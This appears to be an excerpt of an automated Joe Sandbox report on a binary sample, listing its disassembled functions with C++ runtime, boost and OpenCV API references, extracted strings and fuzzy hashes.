                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Getfacet.LIBCPMT ref: 00586EDA
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00586F11
                            • std::_Facet_Register.LIBCPMT ref: 00586F30
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00586F39
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
                            • String ID:
                            • API String ID: 2465509477-0
                            • Opcode ID: b590dd5a95d5c7176f4f4bebd7065758ae2287e4ec53d536990459d5111684b0
                            • Instruction ID: 36bdd8f9b3c6d3a715d4fecd9f9c2dd12b19e362289941a1946ed2d3c47ad54d
                            • Opcode Fuzzy Hash: b590dd5a95d5c7176f4f4bebd7065758ae2287e4ec53d536990459d5111684b0
                            • Instruction Fuzzy Hash: 4001CE76D0012A97CF11FBA0D846ABDBB76BF90720F54011EE91177291CF78EA028B85
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog3.LIBCMT ref: 00586F4D
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00586F57
                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Getfacet.LIBCPMT ref: 00586F77
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00586FAE
                            • std::_Facet_Register.LIBCPMT ref: 00586FCD
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00586FD6
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
                            • String ID:
                            • API String ID: 2465509477-0
                            • Opcode ID: 42bc062a20b49ef2b1c4ee798b7d79fe8e9c2541235d5a572d39628af47594b5
                            • Instruction ID: 70afa757b7d331fb800549c0ed43ed25e5934ca25c36f6009688b21e6d67ed3b
                            • Opcode Fuzzy Hash: 42bc062a20b49ef2b1c4ee798b7d79fe8e9c2541235d5a572d39628af47594b5
                            • Instruction Fuzzy Hash: D201E132D0012A8BCF04FBA0D846ABD7B72BF90720F54051EF9117B291CF78EA028B85
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog3.LIBCMT ref: 00586FEA
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00586FF4
                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Getfacet.LIBCPMT ref: 00587014
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0058704B
                            • std::_Facet_Register.LIBCPMT ref: 0058706A
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00587073
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
                            • String ID:
                            • API String ID: 2465509477-0
                            • Opcode ID: 76c01c41dd5076078d920ec235810dd89ba84fe90f6d9e76ab5c1201b3b6a86b
                            • Instruction ID: 3da7bb0c2564773db8884a1d960073aa8a6c50b0925113ed65e372681be063ff
                            • Opcode Fuzzy Hash: 76c01c41dd5076078d920ec235810dd89ba84fe90f6d9e76ab5c1201b3b6a86b
                            • Instruction Fuzzy Hash: E901E176D00129C7CF01FBA0C84AABD7B76BF94720F64011EE91177291DF78EA028B95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog3.LIBCMT ref: 005871C1
                            • std::_Lockit::_Lockit.LIBCPMT ref: 005871CB
                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Getfacet.LIBCPMT ref: 005871EB
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00587222
                            • std::_Facet_Register.LIBCPMT ref: 00587241
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0058724A
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
                            • String ID:
                            • API String ID: 2465509477-0
                            • Opcode ID: 387cc7aec688d462a92743a8f6240c499c95f90d55785faf0e26c8bd3269279b
                            • Instruction ID: 53baad933a1a9d78d5ebf71a7db44f88538b6f9be4b6698cc70fe2232b2cdb36
                            • Opcode Fuzzy Hash: 387cc7aec688d462a92743a8f6240c499c95f90d55785faf0e26c8bd3269279b
                            • Instruction Fuzzy Hash: FE01CE36D0412A87CF05FBA0C846ABD7B76BF84720F64051EF82277291DF78EA018795
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog3.LIBCMT ref: 0058725E
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00587268
                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Getfacet.LIBCPMT ref: 00587288
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 005872BF
                            • std::_Facet_Register.LIBCPMT ref: 005872DE
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 005872E7
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
                            • String ID:
                            • API String ID: 2465509477-0
                            • Opcode ID: 035a0d2cb02ef3ccdf8db43625f66f48ba025dba11e6e261f966438d970f4d87
                            • Instruction ID: a0ca83432d0efc3d82ab6b7b034826c60db9aabab451f799da73c8dfd84624ce
                            • Opcode Fuzzy Hash: 035a0d2cb02ef3ccdf8db43625f66f48ba025dba11e6e261f966438d970f4d87
                            • Instruction Fuzzy Hash: 97018E76E0012997CF05FBA0C846ABD7B76BF94720F64051EF812772D1DF78AA028795
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog3.LIBCMT ref: 005872FB
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00587305
                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Getfacet.LIBCPMT ref: 00587325
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0058735C
                            • std::_Facet_Register.LIBCPMT ref: 0058737B
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00587384
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
                            • String ID:
                            • API String ID: 2465509477-0
                            • Opcode ID: fe02b0ba852a703a0f06ee0030525541247e9800abe2f3dd819f1a379f7983e9
                            • Instruction ID: 58ef56f43cc110a2dac502ad5072be58545a32b69611c838da8830e03516e16f
                            • Opcode Fuzzy Hash: fe02b0ba852a703a0f06ee0030525541247e9800abe2f3dd819f1a379f7983e9
                            • Instruction Fuzzy Hash: C401C272D001298BCF01FBA0C8869BD7B76BF84720F64051EEC1177291DF78EA029796
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog3.LIBCMT ref: 00587398
                            • std::_Lockit::_Lockit.LIBCPMT ref: 005873A2
                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Getfacet.LIBCPMT ref: 005873C2
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 005873F9
                            • std::_Facet_Register.LIBCPMT ref: 00587418
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00587421
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
                            • String ID:
                            • API String ID: 2465509477-0
                            • Opcode ID: 87f3023760e3cfc150e56195f20c611a203aeff010baed38f69fcacd59f6b086
                            • Instruction ID: d4706e0bdf85535e86c2997f0a725fb0a053402166482df61c576a159a05b070
                            • Opcode Fuzzy Hash: 87f3023760e3cfc150e56195f20c611a203aeff010baed38f69fcacd59f6b086
                            • Instruction Fuzzy Hash: BB01CE36D0012987CF00FBA0C846ABD7B72BF94720F64051EF811772A1DF78AA028796
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00424A02
                              • Part of subcall function 00415A23: WSASocketW.WS2_32(?,?,?,00000000,00000000,00000001), ref: 00415A36
                            • htonl.WS2_32(7F000001), ref: 00424A9C
                            • htonl.WS2_32(00000000), ref: 00424AF3
                            • htonl.WS2_32(7F000001), ref: 00424AFF
                              • Part of subcall function 0041037A: __EH_prolog.LIBCMT ref: 0041037F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: htonl$H_prolog$Socket
                            • String ID: socket_select_interrupter
                            • API String ID: 2867122483-3103927870
                            • Opcode ID: 476b33215517f07283fd2b45fc133062e9e59ec46a9959e9109e143c4796841b
                            • Instruction ID: c75956f0ae3c90dcd665b204e711d45a461bd46a798bdc887665810f99917610
                            • Opcode Fuzzy Hash: 476b33215517f07283fd2b45fc133062e9e59ec46a9959e9109e143c4796841b
                            • Instruction Fuzzy Hash: 8191E871E01108ABDB14DBA4E842BEEB7B9EF84324F60422BF521A72C1DB785F45C794
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041A688
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            • __EH_prolog.LIBCMT ref: 0041A693
                              • Part of subcall function 0047DA23: __EH_prolog.LIBCMT ref: 0047DA28
                              • Part of subcall function 0047DA23: GetModuleHandleA.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 0047DAD7
                              • Part of subcall function 0047DA23: GetProcAddress.KERNEL32(00000000), ref: 0047DADE
                              • Part of subcall function 00413FDC: std::_Throw_Cpp_error.LIBCPMT ref: 00413FE7
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$AddressCpp_errorExceptionException@8HandleModuleProcRaiseThrowThrow_std::_
                            • String ID: 5$u$~
                            • API String ID: 3644655947-2497507236
                            • Opcode ID: 2e20ac243c5e41d472c0d486c311622b054e3069dbec997de60e45dc2e5ccd2f
                            • Instruction ID: c6e0f3e7d2fd5dbe3bcb36ba580f339431f1455650e05b2d2ab67a5bd05c9d7b
                            • Opcode Fuzzy Hash: 2e20ac243c5e41d472c0d486c311622b054e3069dbec997de60e45dc2e5ccd2f
                            • Instruction Fuzzy Hash: 8081D671D0424CEEDB00EFE9D881BEDBBB8EF55304F20412EE515A7191EB785A84CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00436923
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            • __EH_prolog.LIBCMT ref: 0043692E
                              • Part of subcall function 00460981: __EH_prolog.LIBCMT ref: 00460986
                              • Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8
                              • Part of subcall function 004350CF: __EH_prolog.LIBCMT ref: 004350D4
                              • Part of subcall function 004350CF: new.LIBCMT ref: 0043511A
                              • Part of subcall function 004AB703: std::_Deallocate.LIBCONCRT ref: 004AB733
                              • Part of subcall function 00411B0E: std::_Deallocate.LIBCONCRT ref: 00411B20
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeallocateH_prologstd::_$ExceptionException@8RaiseThrow
                            • String ID: 1.38$d$unknown
                            • API String ID: 3768170552-1437315834
                            • Opcode ID: 1e17f2a58c6cf6216fbb7830a8c410540dc51f30c6a96e7d70682d0a518b9a90
                            • Instruction ID: 4b5ae59505a5be7f1b8f18294c6627526a78df8af475de61f54828c0ffec9e14
                            • Opcode Fuzzy Hash: 1e17f2a58c6cf6216fbb7830a8c410540dc51f30c6a96e7d70682d0a518b9a90
                            • Instruction Fuzzy Hash: 6181F771D0428CEADB10EBA9DD427DDBFB4AF25308F1080AEE54567192DB741F88CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog
                            • String ID: 0 <= _dims && _dims <= CV_MAX_DIM$The total matrix size does not fit to "size_t" type$cv::setSize$s >= 0
                            • API String ID: 3519838083-1770251609
                            • Opcode ID: 1e82fa99286308494e339b38f434e1c5cfdae780e91d060493535c91ab20ebd7
                            • Instruction ID: 4e7a3f975187a7e94f4a0d792aa5d11b4b89b091d2d827e6e5719dbbace165a3
                            • Opcode Fuzzy Hash: 1e82fa99286308494e339b38f434e1c5cfdae780e91d060493535c91ab20ebd7
                            • Instruction Fuzzy Hash: 7F71E2B1A0461DDFDB24DFA4D881AEDBFB1BF49304F14816EE10A972D1EB74AA04CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SetEvent.KERNEL32(?,2D5DBC68), ref: 005CC817
                              • Part of subcall function 00410C7D: __EH_prolog.LIBCMT ref: 00410C82
                              • Part of subcall function 00410C7D: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 00410C94
                            • CloseHandle.KERNEL32(00000000), ref: 005CC80C
                            • CloseHandle.KERNEL32(?,2D5DBC68), ref: 005CC860
                            • CloseHandle.KERNEL32(?), ref: 005CC99E
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandle$Event$CreateH_prolog
                            • String ID: >_B
                            • API String ID: 2825413587-1950707887
                            • Opcode ID: 2e717286908963d8656ae84d804c817d48896b9b0c130644de106978dacdcdc0
                            • Instruction ID: 458aee22616a25a07981d7de558b9808a53f95f8ae8f4babb211df472a5a5754
                            • Opcode Fuzzy Hash: 2e717286908963d8656ae84d804c817d48896b9b0c130644de106978dacdcdc0
                            • Instruction Fuzzy Hash: 7951BFB1A002058FDF14EFA4C984B6ABFA9FF44314F14456DE82ADB282DB35ED41CA55
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00412CE9
                              • Part of subcall function 0040F39B: __EH_prolog.LIBCMT ref: 0040F3A0
                              • Part of subcall function 0041308A: __EH_prolog.LIBCMT ref: 0041308F
                              • Part of subcall function 0041046F: __EH_prolog.LIBCMT ref: 00410474
                            • new.LIBCMT ref: 00412DCD
                              • Part of subcall function 00412F5C: __EH_prolog.LIBCMT ref: 00412F61
                            Strings
                            • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 00412DA3
                            • a0A, xrefs: 00412D65
                            • 5A, xrefs: 00412D76
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog
                            • String ID: a0A$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)$5A
                            • API String ID: 3519838083-280365165
                            • Opcode ID: d389a73c461d148e593af25c107148117d942d5b7ebe5992093653c0ce9fe4e4
                            • Instruction ID: 87e0541cf2904c335b22cf6d6275a1c02b6df84ccc2e5eca1df84b1b5e94cea1
                            • Opcode Fuzzy Hash: d389a73c461d148e593af25c107148117d942d5b7ebe5992093653c0ce9fe4e4
                            • Instruction Fuzzy Hash: 4E5175B0D04288DFDB00DF98D9846EDBFB6AF55308F14806EE404EB241D7B89A49CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: tdA
                            • API String ID: 0-2901657147
                            • Opcode ID: c6e9f190fb23edd07fa84333adef7a853451afe721767e536ff5a6b36f26999d
                            • Instruction ID: 5eac8436f541adff5e16d85cf94dd1f9aa58db9647923bcfe447eda4d50430eb
                            • Opcode Fuzzy Hash: c6e9f190fb23edd07fa84333adef7a853451afe721767e536ff5a6b36f26999d
                            • Instruction Fuzzy Hash: 54410E71A00704BFDB259F78CC41B9ABBFEEB48710F10452EF152DBA81D675994187D4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004B513C
                            • std::exception::exception.LIBCONCRT ref: 004B527C
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004B52AA
                              • Part of subcall function 004B7B20: __EH_prolog.LIBCMT ref: 004B7B25
                              • Part of subcall function 004B7B20: std::exception::exception.LIBCONCRT ref: 004B7B74
                              • Part of subcall function 004B7B20: __CxxThrowException@8.LIBVCRUNTIME ref: 004B7BA2
                              • Part of subcall function 004B7B20: std::exception::exception.LIBCONCRT ref: 004B7BD8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Exception@8H_prologThrow
                            • String ID: 4s$unexpected end of data
                            • API String ID: 1448338827-2591715117
                            • Opcode ID: eb46157da4a711b7671613d0298472427b39623e1ddf097056b9aed906c66bde
                            • Instruction ID: a5bd9f356628c17dcac3fb439ed74d8d2602c6299a8efbe9bec23ffae0727124
                            • Opcode Fuzzy Hash: eb46157da4a711b7671613d0298472427b39623e1ddf097056b9aed906c66bde
                            • Instruction Fuzzy Hash: D14193B0C0968559EB298B6C80447E6FFA66F16314F4883DBD1D44A243C37C99CB8F6D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0042CC24
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            • __EH_prolog.LIBCMT ref: 0042CC2F
                              • Part of subcall function 00476ADD: __EH_prolog.LIBCMT ref: 00476AE2
                              • Part of subcall function 00461197: __EH_prolog.LIBCMT ref: 0046119C
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$ExceptionException@8RaiseThrow
                            • String ID: +$n$y
                            • API String ID: 1193697898-3306889077
                            • Opcode ID: 4850e2b9128ee2efb52ca4193c269e93b515dccdd766e8c8e9ce416194d495e3
                            • Instruction ID: f7e8215d45fa6a78abee873fe4d6ab9a41dfb2205752a1cf28a35e60d1cd1578
                            • Opcode Fuzzy Hash: 4850e2b9128ee2efb52ca4193c269e93b515dccdd766e8c8e9ce416194d495e3
                            • Instruction Fuzzy Hash: 9D411470D04288DEDB10DFA5D9857EDBBB4AF55308F1080AEE109B7282DBB81F49CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            • module != 0 && module->name != 0 && module->version != 0, xrefs: 00526D76
                            • cvRegisterModule, xrefs: 00526D65
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: _strlen$H_prolog
                            • String ID: cvRegisterModule$module != 0 && module->name != 0 && module->version != 0
                            • API String ID: 1011152186-743800567
                            • Opcode ID: e1a8f3d6a4e82fb2512811c3975d2da35bcaee969578eaa46d3e862e12932cdb
                            • Instruction ID: 1c216b274c29c07072239776dbc70d41aa8b3040de0a75e9c3b73208a9111316
                            • Opcode Fuzzy Hash: e1a8f3d6a4e82fb2512811c3975d2da35bcaee969578eaa46d3e862e12932cdb
                            • Instruction Fuzzy Hash: BD31E0B2A002189BEB19DBA4DC51BEEBBB5EF45304F10852AF502D66A2DB749948CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 00582111: __CxxThrowException@8.LIBVCRUNTIME ref: 0058212B
                              • Part of subcall function 00582151: __CxxThrowException@8.LIBVCRUNTIME ref: 0058216B
                            • __EH_prolog.LIBCMT ref: 00422C56
                              • Part of subcall function 004B041D: __EH_prolog.LIBCMT ref: 004B0422
                            Strings
                            • stoull argument out of range, xrefs: 00422C46
                            • invalid stoull argument, xrefs: 00422C3C
                            • invalid stoll argument, xrefs: 00422BE1
                            • stoll argument out of range, xrefs: 00422BEB
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Exception@8H_prologThrow
                            • String ID: invalid stoll argument$invalid stoull argument$stoll argument out of range$stoull argument out of range
                            • API String ID: 3222999186-1946835417
                            • Opcode ID: ccb6d40b597528f8010f630c3a5fe01da19375f0980106ba19eb153fbf8ae837
                            • Instruction ID: fe06e94a4b8c7fc3fce178cda7316d0877a1ce9cf2d97226f3a7738e49367a7f
                            • Opcode Fuzzy Hash: ccb6d40b597528f8010f630c3a5fe01da19375f0980106ba19eb153fbf8ae837
                            • Instruction Fuzzy Hash: 5721D772B10218BFEB14AA94DD47AAEB7ADEF81321F10016AF90453602DBF56D00C7B5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __swprintf.LEGACY_STDIO_DEFINITIONS ref: 00526A0F
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00526A67
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Exception@8Throw__swprintf
                            • String ID: %s$OpenCV Error: %s (%s) in %s, file %s, line %d$unknown function
                            • API String ID: 2877379683-3808662302
                            • Opcode ID: f0bf1f0858aa9d57627bb78dcaa79b95fe79175b50f9a71919c5454ad5ba66d1
                            • Instruction ID: 3b8d40520611cb171773fca5a058683afeea0e28cbdaed5988659c37b117de5a
                            • Opcode Fuzzy Hash: f0bf1f0858aa9d57627bb78dcaa79b95fe79175b50f9a71919c5454ad5ba66d1
                            • Instruction Fuzzy Hash: 3431AF70500611DFEB18DB64E909E667BAAFF86300F50096CE142875E2DBB1F9C0CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
